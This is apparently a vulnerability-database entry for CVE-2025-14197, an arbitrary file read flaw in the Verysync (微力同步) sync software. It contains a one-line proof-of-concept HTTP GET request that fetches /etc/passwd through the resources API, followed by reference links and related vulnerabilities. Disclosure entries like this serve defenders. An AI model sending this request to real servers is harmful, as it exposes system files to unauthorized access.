PoC Copy GET /rest/f/api/resources/f96956469e7be39d/etc/passwd?override=false HTTP/1.1 Host: # Visit https://trap.biu.life/ to view exploit trends for this vulnerability. Source: https://vip.vulbox.com/detail/2008732141172690944
References https://blog.csdn.net/m0_50125527/article/details/156446876 https://vuldb.com/?id.334617 https://attackerkb.com/topics/5PsTi9108s/cve-2025-14197 https://app.opencve.io/cve/?product=verysync&vendor=verysync https://vuldb.com/?submit.699537 https://github.com/advisories/GHSA-wghp-x8f8-p2w5 https://cve.imfht.com/detail/CVE-2025-14197
Related VulnerabilitiesMPDV Mikrolab GmbH HYDRA X, MIP 2, FEDRA 2 /hx/resources/public/$SCHEMAS$ 文件读取漏洞(CVE-2025-12055)微力同步 /rest/f/api/resources/f96956469e7be39d 文件读取漏洞微力同步-VeriSync resources 任意文件读取漏洞微力同步 /rest/f/api/raw/f96956469e7be39d 文件读取漏洞(CVE-2025-14197)HJSoft HCM Human Resources Management System /selfservice/lawresource/downlawbase SQL 注入漏洞(CVE-2025-10197)PoCCVE-2015-3648: ResourceSpace - Local File inclusionPoCCVE-2021-41951: Resourcespace - Cross-Site ScriptingPoCCVE-2022-31260: ResourceSpace - Metadata ExportPoCeks-aws-managed-iam-policy: Use AWS-managed policy to manage AWS resourcesPoCeks-iam-managed-policy-networking: Use AWS-managed policy to Manage Networking Resources